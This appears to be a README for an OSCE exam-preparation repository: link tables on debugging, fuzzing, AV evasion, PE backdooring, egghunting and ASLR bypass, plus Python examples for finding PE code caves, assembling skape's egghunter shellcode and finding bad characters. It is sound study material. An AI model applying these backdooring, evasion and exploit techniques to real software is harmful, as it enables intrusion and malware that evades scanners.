The Journey to OSCE
This repository contains a list of free or inexpensive resources that can be used as preparation for Offensive Security's Cracking the Perimeter (CTP) course and OSCE certification.
The tables below list notes, courses, challenges, and tutorials that can be used in preparation for the OSCE. Note that the content of many of these sources overlaps, so not all of them are needed.
The code located herein is associated with the various tutorials listed.
Sam Sanoop started this list and I noticed that there is more to be done!
Debugging
Name | Type | Link |
---|---|---|
[Pentester Academy] (SecurityTube) GNU Debugger Megaprimer | Video Series | https://www.pentesteracademy.com/course?id=4 |
[InfoSec Institute] Exploit Dev Debugging Fundamentals | Blog | https://resources.infosecinstitute.com/debugging-fundamentals-for-exploit-development/ |
WinDBG Commands | Cheatsheet | https://briolidz.wordpress.com/2013/11/17/windbg-some-debugging-commands/ |
[Corelan] Exploit Writing Tutorial part 5: How debugger modules & plugins can speed up basic exploit development | Blog | http://www.corelan.be/index.php/2009/09/05/exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-basic-exploit-development/ |
[Corelan] Mona.py The Manual | Cheatsheet | https://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/r |
Mona.py: The Exploit Writer's Swiss Army Knife | Presentation | https://www.youtube.com/watch?v=y2zrEAwmdws |
Web Application Security
AV Bypass / Evasion
Name | Type | Link |
---|---|---|
Art of Anti Detection #1 - Intro to AV & Detection Techniques | Paper | http://web.archive.org/web/20161213055552/https://www.exploit-db.com/docs/40900.pdf |
Art of Anti Detection #1 - Intro to AV & Detection Techniques | Blog | https://pentest.blog/art-of-anti-detection-1-introduction-to-av-detection-techniques/ |
Bypassing AV Scanners | Paper | https://dl.packetstormsecurity.net/papers/bypass/bypassing-av.pdf |
[SecuritySift] peCloak.py - An Experiment in AV Evasion | Blog | https://www.securitysift.com/pecloak-py-an-experiment-in-av-evasion/ |
Backdooring PEs
Name | Type | Link |
---|---|---|
Portable Executable File Format | Blog | https://blog.kowalczyk.info/articles/pefileformat.html |
Understanding PE Structure, The Layman's Way | Blog | https://tech-zealots.com/malware-analysis/pe-portable-executable-structure-malware-analysis-part-2/ |
Backdooring PE Files - Part 1 | Blog | http://sector876.blogspot.co.uk/2013/03/backdooring-pe-files-part-1.html |
Backdooring PE Files - Part 2 | Blog | http://sector876.blogspot.co.uk/2013/03/backdooring-pe-files-part-2.html |
Beginner's Guide to Codecaves | Blog | https://www.codeproject.com/Articles/20240/The-Beginners-Guide-to-Codecaves |
Backdooring Windows EXEs for Fun and Profit | Blog | http://ly0n.me/2015/07/09/backdooring-windows-exes-for-fun-and-profit-part-1/ |
Art of Anti Detection #2 - PE Backdoor Manufacturing | Paper | http://web.archive.org/web/20170401142227/https://www.exploit-db.com/docs/41129.pdf |
Art of Anti Detection #2 - PE Backdoor Manufacturing | Blog | https://pentest.blog/art-of-anti-detection-2-pe-backdoor-manufacturing/ |
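
As an added example (not code from this repository or from the tutorials above), the following Python script does by hand what the Sector876, ly0n and CodeProject posts do in a debugger: it parses a PE's section table and lists runs of null bytes large enough to hold a stager, the "code caves" you patch a backdoor into. Everything here is assumed for illustration: `build_sample_pe` produces a constructed, minimal, non-loadable PE32 file layout so the script runs offline, and `SAMPLE_PE` is that fixture. On a real target, pass the bytes of the EXE to `find_code_caves` instead.

```python
import struct

# Section characteristics from winnt.h that decide whether a cave is usable as-is.
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def parse_sections(pe: bytes) -> list:
    """Walk DOS header -> PE signature -> COFF header -> section table."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    (_machine, num_sections, _stamp, _symtab, _nsyms,
     opt_hdr_size, _flags) = struct.unpack_from("<HHIIIHH", pe, coff)
    table = coff + 20 + opt_hdr_size      # section table follows the optional header
    sections = []
    for i in range(num_sections):
        (name, vsize, va, raw_size, raw_ptr, _relocs, _lines,
         _nrelocs, _nlines, chars) = struct.unpack_from("<8sIIIIIIHHI", pe, table + 40 * i)
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "virtual_size": vsize, "virtual_address": va,
            "raw_size": raw_size, "raw_ptr": raw_ptr, "characteristics": chars,
        })
    return sections


def find_code_caves(pe: bytes, min_size: int = 32) -> list:
    """Runs of at least min_size null bytes inside each section's raw data.

    file_offset is where you patch the stager in; rva (+ ImageBase) is what
    the hijacked entry point or hooked call must jump to. Caves in sections
    without IMAGE_SCN_MEM_EXECUTE only work if you also flip the section
    flags, which is one more thing for a scanner to notice.
    """
    caves = []
    for s in parse_sections(pe):
        data = pe[s["raw_ptr"]:s["raw_ptr"] + s["raw_size"]]
        start = None
        for i, b in enumerate(data + b"\x01"):    # sentinel flushes a trailing run
            if b == 0:
                if start is None:
                    start = i
            elif start is not None:
                if i - start >= min_size:
                    caves.append({
                        "section": s["name"],
                        "file_offset": s["raw_ptr"] + start,
                        "rva": s["virtual_address"] + start,
                        "size": i - start,
                        "executable": bool(s["characteristics"] & IMAGE_SCN_MEM_EXECUTE),
                    })
                start = None
    return caves


def build_sample_pe(sections: list, file_align: int = 0x200, sect_align: int = 0x1000) -> bytes:
    """Constructed fixture: a minimal PE32 *file layout* (headers plus padded
    section bodies) from (name, data, characteristics) tuples. It parses, it
    does not load; it exists so the scanner above can run offline."""
    def align(n, a):
        return (n + a - 1) // a * a

    e_lfanew, opt_hdr_size = 0x40, 0xE0                 # PE32 optional header size
    raw_ptr = align(e_lfanew + 4 + 20 + opt_hdr_size + 40 * len(sections), file_align)
    va, table, bodies = sect_align, b"", b""
    for name, data, chars in sections:
        raw_size = align(len(data), file_align)         # file-alignment slack is the classic cave
        table += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), len(data), va,
                             raw_size, raw_ptr, 0, 0, 0, 0, chars)
        bodies += data.ljust(raw_size, b"\0")
        raw_ptr += raw_size
        va += align(max(len(data), 1), sect_align)
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_hdr_size, 0x0102)
    opt = struct.pack("<H", 0x10B).ljust(opt_hdr_size, b"\0")   # PE32 magic, rest zeroed
    headers = dos + b"PE\0\0" + coff + opt + table
    return headers.ljust(align(len(headers), file_align), b"\0") + bodies


# Constructed sample: .text with a 64-byte null gap between two code blobs plus
# its alignment slack, and a small non-executable .data section.
SAMPLE_PE = build_sample_pe([
    (b".text", b"\x55\x8b\xec" * 20 + b"\0" * 64 + b"\xc3" * 5,
     IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
    (b".data", b"A" * 40,
     IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
])

if __name__ == "__main__":
    for cave in find_code_caves(SAMPLE_PE):
        print(f"{cave['section']:<8} file=0x{cave['file_offset']:06x} rva=0x{cave['rva']:06x} "
              f"size={cave['size']:<5} exec={cave['executable']}")
```

Prefer a cave that is already executable (alignment slack at the end of `.text` is the usual pick) over a larger one in `.data`: patching section characteristics to RWX is exactly the kind of anomaly the AV-evasion papers above list as a signature. Remember that `rva` is only the jump target after adding ImageBase, and that a relocatable image still needs the cave reached via a relative jump or a fixed-up absolute address.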
Assembly Language & Shellcode
Fuzzing
Name | Type | Link |
---|---|---|
[InfoSec Institute] Intro to Fuzzing | Tutorial | https://resources.infosecinstitute.com/intro-to-fuzzing/ |
[InfoSec Institute] Fuzzer Automation with Spike | Tutorial | http://resources.infosecinstitute.com/fuzzer-automation-with-spike/ |
Introduction to Network Protocol Fuzzing & Buffer Overflow Exploitation | Blog | https://blog.own.sh/introduction-to-network-protocol-fuzzing-buffer-overflow-exploitation/ |
Very Unofficial Dummies Guide to Scapy | Tutorial | https://theitgeekchronicles.files.wordpress.com/2012/05/scapyguide1.pdf |
HowTo: ExploitDev Fuzzing | Blog | https://hansesecure.de/2018/03/howto-exploitdev-fuzzing/ |
[Vulnserver] Exploiting TRUN Command via Vanilla EIP Overwrite | Blog | https://captmeelo.com/exploitdev/osceprep/2018/06/27/vulnserver-trun.html |
[Vulnserver] Boofuzzing Vulnserver for EIP Overwrite | Blog | https://h0mbre.github.io/Boofuzz_to_EIP_Overwrite/# |
Boofuzz – A helpful guide (OSCE – CTP) | Blog | https://zeroaptitude.com/zerodetail/fuzzing-with-boofuzz/ |
Stack-Based Overflow
Structured Exception Handling (SEH) Overwrite
Egghunting
Name | Type | Link |
---|---|---|
[Skape] Safely Searching Process Virtual Address Space | Paper | https://web.archive.org/web/20061010194043/http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf |
[SecuritySift] Windows Exploit Dev #5: Locating Shellcode with Egghunting | Tutorial | http://www.securitysift.com/windows-exploit-development-part-5-locating-shellcode-egghunting/ |
[Corelan] Exploit Writing #8: Win32 Egghunting | Tutorial | https://www.corelan.be/index.php/2010/01/09/exploit-writing-tutorial-part-8-win32-egg-hunting/ |
[FuzzySec] Windows Exploit Dev #4: Egg Hunters | Tutorial | http://fuzzysecurity.com/tutorials/expDev/4.html |
[Vulnserver] GMON Egghunter with Character Restrictions | Tutorial | https://h0mbre.github.io/Badchars_Egghunter_SEH_Exploit/ |
[HackSys Team] Egghunter | Paper | http://web.archive.org/web/20150717003732/https://www.exploit-db.com/docs/18482.pdf |
[SecuritySift] EggSandwich - An Egghunter with Integrity | Blog | https://www.securitysift.com/eggsandwich-egghunter-integrity/ |
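
As an added example (not code from this repository, from skape's paper or from the Corelan/FuzzySec/SecuritySift tutorials), the Python below assembles skape's 32-byte NtAccessCheckAndAuditAlarm egghunter for a chosen tag, builds the egg-prefixed payload, and then models the hunter's search order in pure Python over a constructed fake address space, including an unmapped page and a decoy single copy of the tag. The assembly bytes are the classic hunter the tutorials above use (32-bit Windows, `int 0x2e` syscall 0x02); `simulate_hunt`, `build_sample_memory`, `PAGE_SIZE` and `SHELLCODE` are assumptions made for this illustration and are not part of any real hunter.

```python
PAGE_SIZE = 0x1000

# Constructed marker standing in for real shellcode (8 NOPs then int3).
SHELLCODE = b"\x90" * 8 + b"\xcc"


def egghunter(tag: bytes = b"w00t") -> bytes:
    """Skape's 32-byte NtAccessCheckAndAuditAlarm egghunter for 32-bit Windows.

    EDX is the cursor. Each page is probed with the syscall; if AL comes back
    as 0x05 (low byte of STATUS_ACCESS_VIOLATION) the page is unmapped and the
    cursor skips to the next one, otherwise two SCASD compare 8 bytes against
    the doubled tag and JMP EDI lands just past the egg.
    """
    if len(tag) != 4:
        raise ValueError("tag must be exactly 4 bytes")
    return b"".join([
        b"\x66\x81\xca\xff\x0f",  # loop_start: or  dx, 0x0fff   ; last byte of the page
        b"\x42",                  # next_addr:  inc edx
        b"\x52",                  #             push edx         ; syscall argument
        b"\x6a\x02",              #             push 0x02        ; NtAccessCheckAndAuditAlarm
        b"\x58",                  #             pop eax
        b"\xcd\x2e",              #             int 0x2e
        b"\x3c\x05",              #             cmp al, 0x05     ; access violation?
        b"\x5a",                  #             pop edx
        b"\x74\xef",              #             je  loop_start   ; yes: skip the page
        b"\xb8" + tag,            #             mov eax, tag
        b"\x8b\xfa",              #             mov edi, edx
        b"\xaf",                  #             scasd            ; first copy of the tag
        b"\x75\xea",              #             jne next_addr
        b"\xaf",                  #             scasd            ; second copy
        b"\x75\xe7",              #             jne next_addr
        b"\xff\xe7",              #             jmp edi          ; edi now points past the egg
    ])


def egg_payload(tag: bytes, shellcode: bytes) -> bytes:
    """What goes in the big buffer: the doubled tag immediately followed by
    the shellcode. Doubling matters because the hunter itself carries one
    copy of the tag (the mov eax imm32); a single-tag match would jump into
    the hunter's own code instead of the shellcode."""
    return tag * 2 + shellcode


def simulate_hunt(mem: bytes, unmapped: set, tag: bytes, start: int = 0):
    """Python model of the hunter's search order over a fake address space.

    `mem` is a flat image of the address space, `unmapped` the set of page
    numbers where the probe would fault. Mirrors the assembly: the first two
    instructions always advance to the next page boundary (so the page the
    hunter starts in is never scanned), an unmapped page is skipped whole,
    and a mapped page is scanned one byte at a time. Returns the address
    JMP EDI would land on, or None if the egg is never found.
    """
    egg = tag * 2
    addr = (start | (PAGE_SIZE - 1)) + 1         # or dx, 0x0fff ; inc edx
    while addr + len(egg) <= len(mem):
        if addr // PAGE_SIZE in unmapped:
            addr = (addr | (PAGE_SIZE - 1)) + 1  # je loop_start path
            continue
        if mem[addr:addr + len(egg)] == egg:     # both scasd matched
            return addr + len(egg)
        addr += 1                                # jne next_addr path
    return None


def build_sample_memory(tag: bytes = b"w00t"):
    """Constructed six-page address space: page 0 is where the hunter starts,
    page 1 holds a decoy single tag, pages 2-3 are unmapped, page 4 holds the
    real egg followed by SHELLCODE, page 5 is mapped but empty."""
    mem = bytearray(6 * PAGE_SIZE)
    decoy = 1 * PAGE_SIZE + 0x10
    mem[decoy:decoy + 4] = tag
    payload = egg_payload(tag, SHELLCODE)
    egg_at = 4 * PAGE_SIZE + 0x200
    mem[egg_at:egg_at + len(payload)] = payload
    return bytes(mem), {2, 3}


if __name__ == "__main__":
    hunter = egghunter()
    print(f"hunter ({len(hunter)} bytes): {hunter.hex()}")
    mem, unmapped = build_sample_memory()
    landing = simulate_hunt(mem, unmapped, b"w00t")
    print(f"landing address: {landing:#x}, bytes there: {mem[landing:landing + 9].hex()}")
```

Two practical checks fall out of the model: the hunter never scans the page it starts in, so place it where EDX (or whatever register you seed it from) is not already in the page holding the egg, and the 4-byte tag must not be a byte sequence that otherwise occurs doubled in the process, which is why the tutorials pick something like `w00t` rather than `AAAA`. The hunter bytes above still have to be checked against the target's bad characters before use.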
Address Space Layout Randomization (ASLR) Bypass
Name | Type | Link |
---|---|---|
[Corelan] Exploit Writing #6: Bypassing Stack Cookies, SafeSEH, SEHOP, HW DEP, and ASLR | Tutorial | https://www.corelan.be/index.php/2009/09/21/exploit-writing-tutorial-part-6-bypassing-stack-cookies-safeseh-hw-dep-and-aslr/ |
Bypassing ASLR | Paper | http://web.archive.org/web/20171015120748/https://www.exploit-db.com/docs/18744.pdf |
Network Attacks
Name | Type | Link |
---|---|---|
TCP Session Hijacking | Paper | https://www.exploit-db.com/papers/13587 |
[Muts] Cisco SNMP Configuration Attack with GRE Tunnel | Paper | https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=50318646-6402-48f0-82db-25d00ac3d76c&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments |
Hacking Networks with SNMP | Blog | https://web.archive.org/web/20180808174050/https://0x41.no/hacking-networks-with-snmp/ |
Bypassing Router's Access Control List | Blog | https://securityshards.wordpress.com/2016/02/05/bypassing-routers-access-control-list-acl/ |
Case Studies
Name | Type | Link |
---|---|---|
[Muts] From Bug to 0-Day | Presentation | https://www.youtube.com/watch?v=axTthxE-z6A |
[Muts] Bypassing Cisco SNMP Access Lists Using Spoofed SNMP Requests | Blog | https://web.archive.org/web/20051024151559/http://new.remote-exploit.org/index.php/SNMP_Spoof |
Encoding, Restrictions, Bad Characters, and Other Exploit Development Resources
Name | Type | Link |
---|---|---|
[Corelan] Exploit Writing #4: From Exploit to Metasploit | Tutorial | http://www.corelan.be/index.php/2009/08/12/exploit-writing-tutorials-part-4-from-exploit-to-metasploit-the-basics/ |
[Corelan] Exploit Writing #7: Unicode from 0x00410041 to calc | Tutorial | http://www.corelan.be/index.php/2009/11/06/exploit-writing-tutorial-part-7-unicode-from-0x00410041-to-calc/ |
[FuzzySec] Windows Exploit Dev #5: Unicode 0x00410041 | Tutorial | https://www.fuzzysecurity.com/tutorials/expDev/5.html |
[SecuritySift] Windows Exploit Dev #7: Unicode Buffer Overflows | Tutorial | https://www.securitysift.com/windows-exploit-development-part-7-unicode-buffer-overflows/ |
Eliminating the bad characters in your Exploit | Presentation | https://www.youtube.com/watch?v=IOjl3tU1Ht8 |
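
As an added example (not code from this repository or from the Corelan, FuzzySec or SecuritySift tutorials above), the Python below automates the bad-character loop those tutorials do by hand with a `\x01..\xff` buffer and a memory compare in the debugger: send the probe, find the first byte that did not survive, add it to the exclusion list, resend. `fake_target` is a constructed stand-in for a line-based service whose parser cuts at LF, strips CR and `strcpy()`s the result into the overflowed buffer; in a real session `deliver` is your send-then-dump-from-the-debugger step and the function name is an assumption made here.

```python
def badchar_probe(exclude=()) -> bytes:
    """Every byte value except those already known to be bad, in order."""
    return bytes(b for b in range(256) if b not in exclude)


def first_mismatch(sent: bytes, observed: bytes):
    """First byte of `sent` that did not survive in `observed` (the copy was
    truncated there, the byte was dropped, or it was rewritten), else None.

    Caveat: a byte that gets *expanded* (for example '%' doubled by a
    printf-style layer) shifts the mismatch one position later, so confirm
    each reported byte in the dump before trusting it.
    """
    for i, b in enumerate(sent):
        if i >= len(observed) or observed[i] != b:
            return b
    return None


def find_bad_chars(deliver, exclude=()) -> list:
    """Iterate until a probe survives intact; returns the full bad-char list
    (pre-excluded bytes included, in discovery order).
    `deliver(payload)` must return the bytes as they ended up in memory."""
    bad = list(exclude)
    while True:
        probe = badchar_probe(bad)
        offender = first_mismatch(probe, deliver(probe))
        if offender is None:
            return bad
        bad.append(offender)


def fake_target(data: bytes) -> bytes:
    """Constructed vulnerable service: command ends at LF, CR is stripped by
    the protocol layer, then strcpy() stops at the first NUL."""
    line = data.split(b"\n", 1)[0]
    line = line.replace(b"\r", b"")
    return line.split(b"\0", 1)[0]


def collisions(shellcode: bytes, bad) -> set:
    """Bytes of an (encoded) payload that collide with the bad-char list; an
    empty set is the check to run before shipping the final buffer."""
    return set(shellcode) & set(bad)


if __name__ == "__main__":
    bad = find_bad_chars(fake_target)
    print("bad chars:", ", ".join(f"\\x{b:02x}" for b in bad))
    # Constructed stub: a NOP sled ending in LF would break on this target.
    print("collisions in sample payload:", collisions(b"\x90" * 4 + b"\x0a", bad))
```

Run the loop once per restart of the target, because a new crash is needed for each probe, and feed the final list straight into the encoder (`msfvenom -b '\x00\x0a\x0d'`) and into `collisions()` on the encoded output, since an encoder's decoder stub can itself contain a bad byte.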
Practical
Name | Type | Link |
---|---|---|
Vulnserver | Lab | https://github.com/stephenbradshaw/vulnserver |
Introducing Vulnserver | Tutorial | http://grey-corner.blogspot.com/2010/12/introducing-vulnserver.html |
[Exploit-Exercises] Protostar | Lab | https://www.vulnhub.com/entry/exploit-exercises-protostar-v2,32/ |
[Exploit-Exercises] Protostar | Lab (Challenges) | https://web.archive.org/web/20180322220122/https://exploit-exercises.com/protostar/ |
[Exploit-Exercises] Fusion | Lab | https://www.vulnhub.com/entry/exploit-exercises-fusion-v2,15/ |
[Exploit-Exercises] Fusion | Lab (Challenges) | https://web.archive.org/web/20180820234507/https://exploit-exercises.com/fusion/ |
[OverTheWire] Narnia | Lab | https://overthewire.org/wargames/narnia/ |
Windows Internals (Not required, but definitely helpful)
Misc/Extra
Name | Type | Link |
---|---|---|
[Muts] Live Demo from Backtrack to the MAX 1/5 | Presentation | https://www.youtube.com/watch?v=kwq5VQj3Ils |
[Muts] Live Demo from Backtrack to the MAX 2/5 | Presentation | https://www.youtube.com/watch?v=ykfHy2lX88c |
[Muts] Live Demo from Backtrack to the MAX 3/5 | Presentation | https://www.youtube.com/watch?v=IWf7UM7qX0M |
[Muts] Live Demo from Backtrack to the MAX 4/5 | Presentation | https://www.youtube.com/watch?v=azepnwdVfyU |
[Muts] Live Demo from Backtrack to the MAX 5/5 | Presentation | https://www.youtube.com/watch?v=6gmAoW1mtYg |
[OffSec] Quickzip Stack BOF 0-Day: A Box of Chocolates | Blog | https://www.offensive-security.com/vulndev/quickzip-stack-bof-0day-a-box-of-chocolates/ |